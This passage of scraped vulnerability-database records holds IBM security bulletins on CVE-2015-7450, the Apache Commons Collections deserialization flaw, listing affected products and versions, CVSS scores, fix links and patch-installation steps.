Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nTivoli Workload Scheduler is potentially impacted by the listed vulnerability since it potentially affects secure communications between eWAS or WebSphere and subcomponents. \n \nThe affected versions are: \nTivoli Workload Scheduler Distributed 8.6.0 \nTivoli Dynamic Workload Console 8.6.0 \nTivoli Workload Scheduler z/OS Connector 8.6.0 \nTivoli Workload Scheduler Distributed 9.1.0 \nTivoli Dynamic Workload Console 9.1.0 \nTivoli Workload Scheduler Distributed 9.2.0 \nTivoli Dynamic Workload Console 9.2.0 \nTivoli Workload Scheduler Distributed 9.3.0 \nTivoli Dynamic Workload Console 9.3.0\n\n## Remediation/Fixes\n\nIBM has provided patches for all embedded WebSphere or WebSphere affected versions. 
Follow the instructions in the link below to install the fixes for TWS 9.1, 9.2 and 9.3 : \n \n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n \nThe fixes can be applied on top of TWS version 8.6 only after the following security bulletin has been applied to upgrade the version of embedded WebSphere to the latest level \n \n[_http://www-01.ibm.com/support/docview.wss?uid=swg21700706_](<http://www-01.ibm.com/support/docview.wss?uid=swg21700706%20>) \n \n_For__ unsupported versions, releases or platforms__ IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:23", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with Tivoli Workload Scheduler (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:23", "id": "14D6BD9FB21D986F7A7372B530E1023CD0FF42323E4743E166603718FA4482AC", "href": "https://www.ibm.com/support/pages/node/272373", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:39:56", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Tivoli Netcool Configuration Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes. \n \n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nITNCM version 6.4.1.3 \nITNCM version 6.3.0.6| Embedded IBM WebSphere Application Server eWAS 7.0 \n \n## Remediation/Fixes\n\n_ <Product_| _ VRMF_| _ APAR_| _ Remediation/First Fix_ \n---|---|---|--- \n_ ITNCM_| _ 6.4.1.3 IF001_| _ none_| 
[_http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Tivoli&product=ibm/Tivoli/Tivoli+Netcool+Configuration+Manager&release=6.4.1.3&platform=All&function=fixId&fixids=ITNCM_6.4.1.3_IF001&includeRequisites=1&includeSupersedes=0&downloadMethod=http_](<http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Tivoli&product=ibm/Tivoli/Tivoli+Netcool+Configuration+Manager&release=6.4.1.3&platform=All&function=fixId&fixids=ITNCM_6.4.1.3_IF001&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \n_ ITNCM_| _ 6.3.0.6 IF004_| _ none_| [http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Tivoli+Netcool+Configuration+Manager&release=6.3.0.6&platform=All&function=all](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Tivoli+Netcool+Configuration+Manager&release=6.3.0.6&platform=All&function=all>) \n \n_For ITNCM 6.2.x IBM recommends upgrading to a fixed, supported version/release/platform of the product._ \n\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-22T16:30:15", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Tivoli Netcool Configuration Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-01-22T16:30:15", "id": "D9F9C21739CE0374485FD9F451E99B1E3D3DD763F365282CE7DBE1FD581588A1", "href": "https://www.ibm.com/support/pages/node/273495", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:35", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM WebSphere Appliance Management Center.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM WebSphere Appliance Management Center: 5.0\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \n_WebSphere Appliance Management Center_| _V5.0.0_| \n| [_Link to download_](<https://www-304.ibm.com/support/docview.wss?uid=swg24032265>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:15", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Appliance Management Center (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:15", "id": "B4808CCA5100583DB06B93877F807E289BFD2DCA8CC87EE2179C8D3FDCCB1052", "href": "https://www.ibm.com/support/pages/node/272575", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:40", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Enterprise Service Bus. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [Vulnerability in Apache Commons affects IBM WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes. 
\n\n## Affected Products and Versions\n\nWebSphere Enterprise Service Bus V7.0 \nWebSphere Enterprise Service Bus V7.5\n\n## ", "cvss3": {}, "published": "2018-06-15T07:03:53", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in\u00a0WebSphere Application Server\u00a0shipped with\u00a0WebSphere Enterprise Service Bus (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:03:53", "id": "CFCAA39F64688F83B2BE2991B246FED2B4DFFCF75B54FAABF373FCAAD237C4B3", "href": "https://www.ibm.com/support/pages/node/272875", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T21:42:57", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM i.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nReleases 6.1, 7.1 and 7.2 of IBM i are affected. \n\n## Remediation/Fixes\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by WebSphere Application Server and WebSphere Application Server Hypervisor Edition. This vulnerability does not affect the IBM HTTP Server or versions of WebSphere Application Server prior to Version 7.0. 
Please see the following for fixes: \n \nIBM has provided an Interim Fix for each of the following WebSphere Application Server releases: 7.0, 8.0 and 8.5. The fix will be included in the following \nFix Packs: 7.0.0.41, 8.0.0.12 and 8.5.5.8. Please see details in the following URL: \n \n[_http://www-01.ibm.com/support/docview.wss?uid=swg21970575_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n \nIn addition, the integrated application server can be fixed by applying a PTF to IBM i. \n\n[_http://www-933.ibm.com/support/fixcentral/_](<http://www-933.ibm.com/support/fixcentral/>)\n\n \nReleases 6.1, 7.1 and 7.2 of IBM i are supported and will be fixed. \n \n**Release 6.1 \u2013 SI58494** \n**Release 7.1 \u2013 SI58495** \n**Release 7.2 \u2013 SI58496** \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n \n**_Important note: _**_IBM recommends that all users running unsupported versions of affected products upgrade to supported and fixed version of affected products._\n\n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-18T14:26:38", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM i (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-18T14:26:38", "id": "B634FF2E7FC1F3330432FBCA9743C474852276C64003951811F2A870EB1D6D85", "href": "https://www.ibm.com/support/pages/node/666627", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:53", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Rational Application Developer for WebSphere Software.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)\n\n \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. 
By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system.\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Rational Application Developer for WebSphere Software 9.5 and earlier \nIBM Rational Application Developer for WebSphere Software Standard Edition 8.0\n\n## Remediation/Fixes\n\nUpdate Apache Commons Collections in the product to address this vulnerability: \n \n**Product**| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nRational Application Developer| 8.0 through 9.5| PI53606| \n\n * For all versions, apply [Update to Apache Commons Collections for CVE-2015-7450](<http://www.ibm.com/support/docview.wss?uid=swg24041395>)\n * For the WebSphere Application Server 7.0 Test Environment, apply [WebSphere Application Server 7.0 Test Environment Extension Fix Pack 39 (7.0.0.39)](<http://www.ibm.com/support/docview.wss?uid=swg24041415>)\n * For WebSphere Application Server versions 8.0 and 8.5, see [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:57", "type": "ibm", 
"title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Rational Application Developer for WebSphere Software (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:57", "id": "56089216FE5BBEF3CB97441EEB8BE05F1F746C5131D22F24180904B3788E6C15", "href": "https://www.ibm.com/support/pages/node/274057", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:44", "description": "## Summary\n\nIBM WebSphere Application Server Liberty Profile and Apache Commons are shipped as components of IBM Support Assistant Team Server. The recommended solution is to install the fix made available by IBM WebSphere Application Server and remove the Apache Commons Collections Library bundled with IBM Support Assistant Team Server. \n\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Support Assistant Team Server version 5.0.0, 5.0.1, 5.0.1.1, 5.0.2 and 5.0.2.1 \n\n## Remediation/Fixes\n\nThe recommended solution is to install the fix made available by IBM WebSphere Application Server and remove the Apache Commons Collections Library bundled with IBM Support Assistant Team Server. \n \n**For V5.0.0 through 5.0.2.1:**\n\n * If you are not at the latest version of IBM Support Assistant (V5.0.2.1), you need to upgrade: [_http://www-01.ibm.com/software/support/isa/teamserver.html_](<http://www-01.ibm.com/software/support/isa/teamserver.html>)\n * Remove the Apache Commons Collections v3.2.1 library under <isa_install>/ISA5/wlp/usr/servers/isa/apps/ISA5.ear/lib\n * Apply the [IBM WebSphere Application Server Liberty Profile Interim Fix](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>)\n * Download the archive fix 8556-wlp-archive-IFPI52103.jar that applies to the Liberty profile, fixpack 8.5.5.6. \n * Save the 8556-wlp-archive-IFPI52103.jar file to the <isa_install>/ISA5/ directory\n * Open the console and run the command \"java -jar 8556-wlp-archive-IFPI52103.jar\"\n * Press enter to accept the default directory value <isa_install>/ISA5/wlp\n * Stop ISA\n * Once you start ISA, you should see the following message in <isa_install>/ISA5/wlp/usr/servers/isa/logs/console.log:\n * [AUDIT ] CWWKF0015I: The server has the following interim fixes installed: PI52103. 
\n \nRefer to [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and additional information about fixes. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:14", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in Apache Commons and IBM WebSphere Application Server\u00a0Liberty Profile shipped with IBM Support Assistant Team Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:14", "id": "33F3D4BD9A0409FDFA7A6FD39D37CE20C133CA720204241EF781E5F8B97A23E3", "href": "https://www.ibm.com/support/pages/node/272625", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:51", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for 
handling Java object deserialization was addressed by the Apache Software Foundation. \n\n## Vulnerability Details\n\nIBM Rational DOORS Web Access is affected by the following vulnerability: \n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)\n\n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \n**CVSS Base Score:** 9.8 \n**CVSS Temporal Score:** See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector:** (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nRational DOORS Web Access version 9.6.1.4, 9.6.1.3, 9.6.1.2, 9.6.1.1, 9.6.1.0, 9.6.0.x, 9.5.2.x, 9.5.1.x, 9.5.0.x, 1.5.0.x, 1.4.0.x.\n\n## Remediation/Fixes\n\nA fix for this vulnerability is available from the Apache Software Foundation: \n\n**Rational DOORS Web Access**| **Remediation/Fix** \n---|--- \n1.4.0.x - 9.6.1.x| commons-collections-3.2.2.jar \n \nReplace the commons-collections-3.2.1.jar file in your Rational DOORS Web Access installation with the commons-collections-3.2.2.jar file.\n\n 1. Download the commons-collections-3.2.2-bin.zip file at: \n[_http://commons.apache.org/proper/commons-collections/download_collections.cgi_](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>) \nRelease notes are available here: \n[_http://commons.apache.org/proper/commons-collections/release_3_2_2.html_](<http://commons.apache.org/proper/commons-collections/release_3_2_2.html>)\n 2. Extract the commons-collections-3.2.2.jar file from the file that you downloaded.\n 3. 
Stop the Rational DOORS Web Access server and the broker. \n 4. Remove this file in your installation: <installation directory>\\IBM\\Rational\\DOORS Web Access\\<version number>\\broker\\lib\\optional\\commons-collections-3.2.1.jar\n 5. Copy the new commons-collections-3.2.2.jar to the same location.\n 6. Start the broker and the Rational DOORS Web Access server.\n \n \nFor information on stopping and starting components, see [Starting, stopping, and removing Rational DOORS Web Access](<http://www-01.ibm.com/support/knowledgecenter/SSYQBZ_9.6.1/com.ibm.rational.dwa.install.doc/topics/c_rundoorswebaccess.html>). \n\n\n_For versions for Rational DOORS Web Access that are earlier than version 1.4.0.x, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:42", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational DOORS Web Access (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:42", "id": "5CA427D20F513F1CC81AEF9C09677EF6584321B0D5FFE5209255F3B168E636A4", "href": "https://www.ibm.com/support/pages/node/271839", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:56:16", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of SmartCloud Provisioning. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM SmartCloud Provisioning 1.2| IBM WebSphere Application Server 8.0 \nIBM SmartCloud Provisioning 2.1, 2.3, 2.3.0.1| IBM WebSphere Application Server 8.0 \n \n## Remediation/Fixes\n\nConsult security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for information about fixes. \n \nIf you are running IBM SmartCloud Provisioning 2.1, contact [_IBM support_](<https://www-947.ibm.com/support/servicerequest/newServiceRequest.action>). \n \nFor unsupported 
version/release IBM recommends upgrading to a fixed, supported version/release of the product.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:47", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with SmartCloud Provisioning (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T22:32:47", "id": "DF1E63CF8B14528F156628BE21730C46B9AD6FEBFA9BE46C21DFFEFE8A0D3852", "href": "https://www.ibm.com/support/pages/node/619215", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:49", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of RequisitePro. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. 
